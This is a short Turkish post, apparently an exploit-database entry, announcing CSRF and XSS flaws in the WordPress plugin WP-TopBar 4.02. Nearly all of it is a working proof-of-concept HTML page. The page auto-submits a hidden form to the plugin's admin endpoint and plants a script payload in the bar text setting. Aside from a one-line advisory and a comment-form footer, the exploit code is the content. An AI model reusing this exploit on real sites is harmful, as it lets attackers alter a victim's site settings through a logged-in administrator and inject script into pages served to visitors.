wordpress plugin WP-TopBar 4.02 CSRF

wordpress WP-TopBar 4.02 CSRF eklentisinde XSS ve  Cross Site Request açığı bulundu.

 

<html> <head>     <title>Download</title> </head> <body> <form name=”testform” action=” https://localhost/wordpress/wp-admin/admin.php?page=wp-topbar.php&action=topbartext&barid=1” method=”POST”>     <br>         <input type=”hidden” name=”wptbbartext” value=”</script><script>onload=alert(3)</script>”>         <input type=”hidden” name=”wptblinktext” value=”whatever”>         <input type=”hidden” name=”wptblinkurl” value=”http%3A%2F%2Fwordpress.org%2Fextend%2Fplugins%2Fwp-topbar%2F”>         <input type=”hidden” name=”wptblinktarget” value=”blank”>         <input type=”hidden” name=”wptbenableimage” value=”false”>         <input type=”hidden” name=”wptbbarimage” value=””>         <input type=”hidden” name=”update_wptbSettings” value=”Update+Settings”>

</form> <script type=”text/javascript”>         document.testform.submit();     </script> </body> </html>

 

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir